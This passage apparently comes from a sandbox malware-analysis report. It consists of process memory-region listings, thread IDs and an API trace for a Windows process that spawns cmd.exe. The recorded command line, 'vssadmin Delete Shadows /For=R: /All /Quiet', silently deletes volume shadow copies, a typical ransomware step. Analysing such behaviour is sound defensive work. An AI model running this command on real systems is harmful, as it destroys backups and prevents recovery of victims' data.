	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 2089
	        start_va = 0x7e640000
	          end_va = 0x7e662fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007e640000"
	        filename = ""

Region:
	              id = 2090
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 2091
	        start_va = 0x7fff0000
	          end_va = 0x7df95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 2092
	        start_va = 0x7df95ae70000
	          end_va = 0x7ff95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df95ae70000"
	        filename = ""

Region:
	              id = 2093
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 2094
	        start_va = 0x7ff95b031000
	          end_va = 0x7ffffffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff95b031000"
	        filename = ""

Region:
	              id = 2104
	        start_va = 0x410000
	          end_va = 0x53ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000410000"
	        filename = ""

Region:
	              id = 2105
	        start_va = 0x586b0000
	          end_va = 0x586fffff
	       monitored = 0
	     entry_point = 0x586c8180
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 2107
	        start_va = 0x58630000
	          end_va = 0x586a9fff
	       monitored = 0
	     entry_point = 0x58643290
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 2108
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 2109
	        start_va = 0x58700000
	          end_va = 0x58707fff
	       monitored = 0
	     entry_point = 0x587017c0
	     region_type = mapped_file
	            name = "wow64cpu.dll"
	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 2111
	        start_va = 0x540000
	          end_va = 0x74ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000540000"
	        filename = ""

Region:
	              id = 2112
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 2113
	        start_va = 0x74590000
	          end_va = 0x7470dfff
	       monitored = 0
	     entry_point = 0x74641b90
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 2114
	        start_va = 0x10000
	          end_va = 0x1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 2115
	        start_va = 0x7e540000
	          end_va = 0x7e63ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007e540000"
	        filename = ""

Region:
	              id = 2116
	        start_va = 0x100000
	          end_va = 0x1bdfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 2117
	        start_va = 0x400000
	          end_va = 0x403fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000400000"
	        filename = ""

Region:
	              id = 2118
	        start_va = 0x76630000
	          end_va = 0x766aafff
	       monitored = 0
	     entry_point = 0x7664e970
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")

Region:
	              id = 2119
	        start_va = 0x76820000
	          end_va = 0x768ddfff
	       monitored = 0
	     entry_point = 0x76855630
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")

Region:
	              id = 2120
	        start_va = 0x1c0000
	          end_va = 0x1fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 2121
	        start_va = 0x410000
	          end_va = 0x44ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000410000"
	        filename = ""

Region:
	              id = 2122
	        start_va = 0x530000
	          end_va = 0x53ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000530000"
	        filename = ""

Region:
	              id = 2123
	        start_va = 0x75f10000
	          end_va = 0x75f53fff
	       monitored = 0
	     entry_point = 0x75f29d80
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")

Region:
	              id = 2124
	        start_va = 0x75ba0000
	          end_va = 0x75c4cfff
	       monitored = 0
	     entry_point = 0x75bb4f00
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")

Region:
	              id = 2125
	        start_va = 0x73d70000
	          end_va = 0x73d8dfff
	       monitored = 0
	     entry_point = 0x73d7b640
	     region_type = mapped_file
	            name = "sspicli.dll"
	        filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")

Region:
	              id = 2126
	        start_va = 0x73d60000
	          end_va = 0x73d69fff
	       monitored = 0
	     entry_point = 0x73d62a00
	     region_type = mapped_file
	            name = "cryptbase.dll"
	        filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")

Region:
	              id = 2127
	        start_va = 0x73e10000
	          end_va = 0x73e67fff
	       monitored = 0
	     entry_point = 0x73e525c0
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")

Region:
	              id = 2128
	        start_va = 0x76950000
	          end_va = 0x76a96fff
	       monitored = 0
	     entry_point = 0x76961cf0
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")

Region:
	              id = 2129
	        start_va = 0x6f9d0000
	          end_va = 0x6f9e7fff
	       monitored = 0
	     entry_point = 0x6f9d4820
	     region_type = mapped_file
	            name = "atl.dll"
	        filename = "\\Windows\\SysWOW64\\atl.dll" (normalized: "c:\\windows\\syswow64\\atl.dll")

Region:
	              id = 2130
	        start_va = 0x75dc0000
	          end_va = 0x75f0efff
	       monitored = 0
	     entry_point = 0x75e76820
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")

Region:
	              id = 2131
	        start_va = 0x6f9b0000
	          end_va = 0x6f9c0fff
	       monitored = 0
	     entry_point = 0x6f9b4670
	     region_type = mapped_file
	            name = "vsstrace.dll"
	        filename = "\\Windows\\SysWOW64\\vsstrace.dll" (normalized: "c:\\windows\\syswow64\\vsstrace.dll")

Region:
	              id = 2132
	        start_va = 0x76cf0000
	          end_va = 0x76d81fff
	       monitored = 0
	     entry_point = 0x76d28cf0
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")

Region:
	              id = 2133
	        start_va = 0x73ed0000
	          end_va = 0x7408cfff
	       monitored = 0
	     entry_point = 0x73fb2a10
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")

Region:
	              id = 2134
	        start_va = 0x766b0000
	          end_va = 0x766f4fff
	       monitored = 0
	     entry_point = 0x766cde90
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")

Region:
	              id = 2135
	        start_va = 0x6f890000
	          end_va = 0x6f9aafff
	       monitored = 0
	     entry_point = 0x6f8d0930
	     region_type = mapped_file
	            name = "vssapi.dll"
	        filename = "\\Windows\\SysWOW64\\vssapi.dll" (normalized: "c:\\windows\\syswow64\\vssapi.dll")

Region:
	              id = 2136
	        start_va = 0x76aa0000
	          end_va = 0x76afefff
	       monitored = 0
	     entry_point = 0x76aa4af0
	     region_type = mapped_file
	            name = "ws2_32.dll"
	        filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll")

Region:
	              id = 2137
	        start_va = 0x4880000
	          end_va = 0x4a2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004880000"
	        filename = ""

Region:
	              id = 2138
	        start_va = 0x450000
	          end_va = 0x479fff
	       monitored = 0
	     entry_point = 0x455680
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")

Region:
	              id = 2139
	        start_va = 0x4880000
	          end_va = 0x4a07fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004880000"
	        filename = ""

Region:
	              id = 2140
	        start_va = 0x4a20000
	          end_va = 0x4a2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004a20000"
	        filename = ""

Region:
	              id = 2141
	        start_va = 0x75b70000
	          end_va = 0x75b9afff
	       monitored = 0
	     entry_point = 0x75b75680
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")

Region:
	              id = 2142
	        start_va = 0x450000
	          end_va = 0x45cfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "vssadmin.exe.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\vssadmin.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\vssadmin.exe.mui")

Region:
	              id = 2143
	        start_va = 0x4a30000
	          end_va = 0x4bb0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004a30000"
	        filename = ""

Region:
	              id = 2144
	        start_va = 0x4bc0000
	          end_va = 0x5fbffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004bc0000"
	        filename = ""

Region:
	              id = 2145
	        start_va = 0x20000
	          end_va = 0x20fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000020000"
	        filename = ""

Region:
	              id = 2146
	        start_va = 0x460000
	          end_va = 0x460fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000460000"
	        filename = ""

Region:
	              id = 2147
	        start_va = 0x470000
	          end_va = 0x473fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000470000"
	        filename = ""

Region:
	              id = 2148
	        start_va = 0x540000
	          end_va = 0x629fff
	       monitored = 0
	     entry_point = 0x57d650
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")

Region:
	              id = 2149
	        start_va = 0x650000
	          end_va = 0x74ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000650000"
	        filename = ""

Region:
	              id = 2150
	        start_va = 0x764a0000
	          end_va = 0x764abfff
	       monitored = 0
	     entry_point = 0x764a3930
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")

Region:
	              id = 2999
	        start_va = 0x480000
	          end_va = 0x480fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000480000"
	        filename = ""

Region:
	              id = 3000
	        start_va = 0x76700000
	          end_va = 0x76783fff
	       monitored = 0
	     entry_point = 0x76726220
	     region_type = mapped_file
	            name = "clbcatq.dll"
	        filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll")

Region:
	              id = 3001
	        start_va = 0x490000
	          end_va = 0x490fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000490000"
	        filename = ""

Region:
	              id = 3048
	        start_va = 0x4a0000
	          end_va = 0x4dffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000004a0000"
	        filename = ""

Region:
	              id = 3049
	        start_va = 0x4e0000
	          end_va = 0x51ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000004e0000"
	        filename = ""

Region:
	              id = 3051
	        start_va = 0x540000
	          end_va = 0x57ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000540000"
	        filename = ""

Region:
	              id = 3052
	        start_va = 0x580000
	          end_va = 0x5bffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000580000"
	        filename = ""

Region:
	              id = 3053
	        start_va = 0x5c0000
	          end_va = 0x5fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000005c0000"
	        filename = ""

Region:
	              id = 3054
	        start_va = 0x600000
	          end_va = 0x63ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000600000"
	        filename = ""

Region:
	              id = 3134
	        start_va = 0x750000
	          end_va = 0x82ffff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "kernelbase.dll.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui")

Region:
	              id = 3147
	        start_va = 0x5fc0000
	          end_va = 0x603ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000005fc0000"
	        filename = ""

Region:
	              id = 3148
	        start_va = 0x520000
	          end_va = 0x528fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "vsstrace.dll.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\vsstrace.dll.mui")


Thread:
	id = 96
	os_tid = 0x105c


Thread:
	id = 98
	os_tid = 0x13f8


Thread:
	id = 247
	os_tid = 0xc28


Thread:
	id = 248
	os_tid = 0xc2c


Thread:
	id = 249
	os_tid = 0xc30


Process:
	id = "31"
	image_name = "cmd.exe"
	filename = "c:\\windows\\syswow64\\cmd.exe"
	page_root = "0x1ee6d000"
	os_pid = "0x13fc"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0x117c"
	cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C vssadmin Delete Shadows /For=R: /All /Quiet "
	cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 2154
	        start_va = 0x10000
	          end_va = 0x2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000010000"
	        filename = ""

Region:
	              id = 2155
	        start_va = 0x30000
	          end_va = 0x44fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000030000"
	        filename = ""

Region:
	              id = 2156
	        start_va = 0x50000
	          end_va = 0x8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000050000"
	        filename = ""

Region:
	              id = 2157
	        start_va = 0x90000
	          end_va = 0x18ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000090000"
	        filename = ""

Region:
	              id = 2158
	        start_va = 0x190000
	          end_va = 0x193fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000190000"
	        filename = ""

Region:
	              id = 2159
	        start_va = 0x1a0000
	          end_va = 0x1a0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000001a0000"
	        filename = ""

Region:
	              id = 2160
	        start_va = 0x1b0000
	          end_va = 0x1b1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001b0000"
	        filename = ""

Region:
	              id = 2161
	        start_va = 0x2f0000
	          end_va = 0x341fff
	       monitored = 1
	     entry_point = 0x304fd0
	     region_type = mapped_file
	            name = "cmd.exe"
	        filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")

Region:
	              id = 2162
	        start_va = 0x350000
	          end_va = 0x434ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000350000"
	        filename = ""

Region:
	              id = 2163
	        start_va = 0x4350000
	          end_va = 0x4351fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004350000"
	        filename = ""

Region:
	              id = 2164
	        start_va = 0x4400000
	          end_va = 0x45fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004400000"
	        filename = ""

Region:
	              id = 2165
	        start_va = 0x77040000
	          end_va = 0x771bafff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 2166
	        start_va = 0x7ec50000
	          end_va = 0x7ec72fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007ec50000"
	        filename = ""

Region:
	              id = 2167
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 2168
	        start_va = 0x7fff0000
	          end_va = 0x7df95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 2169
	        start_va = 0x7df95ae70000
	          end_va = 0x7ff95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df95ae70000"
	        filename = ""

Region:
	              id = 2170
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 2171
	        start_va = 0x7ff95b031000
	          end_va = 0x7ffffffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff95b031000"
	        filename = ""

Region:
	              id = 2172
	        start_va = 0x1c0000
	          end_va = 0x2effff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 2173
	        start_va = 0x586b0000
	          end_va = 0x586fffff
	       monitored = 0
	     entry_point = 0x586c8180
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 2174
	        start_va = 0x58630000
	          end_va = 0x586a9fff
	       monitored = 0
	     entry_point = 0x58643290
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 2175
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 2176
	        start_va = 0x58700000
	          end_va = 0x58707fff
	       monitored = 0
	     entry_point = 0x587017c0
	     region_type = mapped_file
	            name = "wow64cpu.dll"
	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 2177
	        start_va = 0x4600000
	          end_va = 0x48dffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004600000"
	        filename = ""

Region:
	              id = 2178
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 2179
	        start_va = 0x74590000
	          end_va = 0x7470dfff
	       monitored = 0
	     entry_point = 0x74641b90
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 2180
	        start_va = 0x10000
	          end_va = 0x1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 2181
	        start_va = 0x7eb50000
	          end_va = 0x7ec4ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007eb50000"
	        filename = ""

Region:
	              id = 2389
	        start_va = 0x1c0000
	          end_va = 0x27dfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 2390
	        start_va = 0x2e0000
	          end_va = 0x2effff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000002e0000"
	        filename = ""

Region:
	              id = 2391
	        start_va = 0x76820000
	          end_va = 0x768ddfff
	       monitored = 0
	     entry_point = 0x76855630
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")

Region:
	              id = 2392
	        start_va = 0x280000
	          end_va = 0x2bffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000280000"
	        filename = ""

Region:
	              id = 2393
	        start_va = 0x4600000
	          end_va = 0x46fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004600000"
	        filename = ""

Region:
	              id = 2394
	        start_va = 0x47e0000
	          end_va = 0x48dffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000047e0000"
	        filename = ""

Region:
	              id = 2395
	        start_va = 0x48e0000
	          end_va = 0x49effff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000048e0000"
	        filename = ""

Region:
	              id = 2417
	        start_va = 0x4350000
	          end_va = 0x4353fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004350000"
	        filename = ""

Region:
	              id = 2438
	        start_va = 0x49f0000
	          end_va = 0x4d26fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")

Region:
	              id = 2439
	        start_va = 0x4360000
	          end_va = 0x4363fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004360000"
	        filename = ""


Thread:
	id = 99
	os_tid = 0x13f4

	[0250.563] GetProcAddress (hModule=0x76d90000, lpProcName="SetConsoleInputExeNameW") returned 0x746ab440
	[0250.565] GetProcessHeap () returned 0x47e0000
	[0250.565] RtlAllocateHeap (HeapHandle=0x47e0000, Flags=0x8, Size=0x400a) returned 0x47e84e0
	[0250.565] GetProcessHeap () returned 0x47e0000
	[0250.566] RtlFreeHeap (HeapHandle=0x47e0000, Flags=0x0, BaseAddress=0x47e84e0) returned 1
	[0250.568] _wcsicmp (_String1="vssadmin", _String2=")") returned 77
	[0250.568] _wcsicmp (_String1="FOR", _String2="vssadmin") returned -16
	[0250.568] _wcsicmp (_String1="FOR/?", _String2="vssadmin") returned -16
	[0250.568] _wcsicmp (_String1="IF", _String2="vssadmin") returned -13
	[0250.568] _wcsicmp (_String1="IF/?", _String2="vssadmin") returned -13
	[0250.568] _wcsicmp (_String1="REM", _String2="vssadmin") returned -4
	[0250.568] _wcsicmp (_String1="REM/?", _String2="vssadmin") returned -4
	[0250.569] GetProcessHeap () returned 0x47e0000
	[0250.569] RtlAllocateHeap (HeapHandle=0x47e0000, Flags=0x8, Size=0x58) returned 0x47e57d0
	[0250.569] GetProcessHeap () returned 0x47e0000
	[0250.569] RtlAllocateHeap (HeapHandle=0x47e0000, Flags=0x8, Size=0x1a) returned 0x47e5830
	[0250.571] GetProcessHeap () returned 0x47e0000
	[0250.571] RtlAllocateHeap (HeapHandle=0x47e0000, Flags=0x8, Size=0x52) returned 0x47e5858
	[0250.573] GetConsoleTitleW (in: lpConsoleTitle=0x18f2f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0250.591] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18
	[0250.592] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17
	[0250.592] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18
	[0250.592] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2
	[0250.592] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19
	[0250.592] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19
	[0250.592] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19
	[0250.592] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4
	[0250.592] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4
	[0250.592] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17
	[0250.592] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3
	[0250.592] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6
	[0250.592] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18
	[0250.592] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2
	[0250.593] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6
	[0250.593] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9
	[0250.593] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9
	[0250.593] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4
	[0250.593] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4
	[0250.593] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6
	[0250.593] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15
	[0250.593] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3
	[0250.593] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19
	[0250.593] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19
	[0250.593] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14
	[0250.593] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14
	[0250.593] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4
	[0250.594] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17
	[0250.594] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3
	[0250.594] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17
	[0250.594] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2
	[0250.594] _wcsicmp (_String1="vssadmin", _String2="START") returned 3
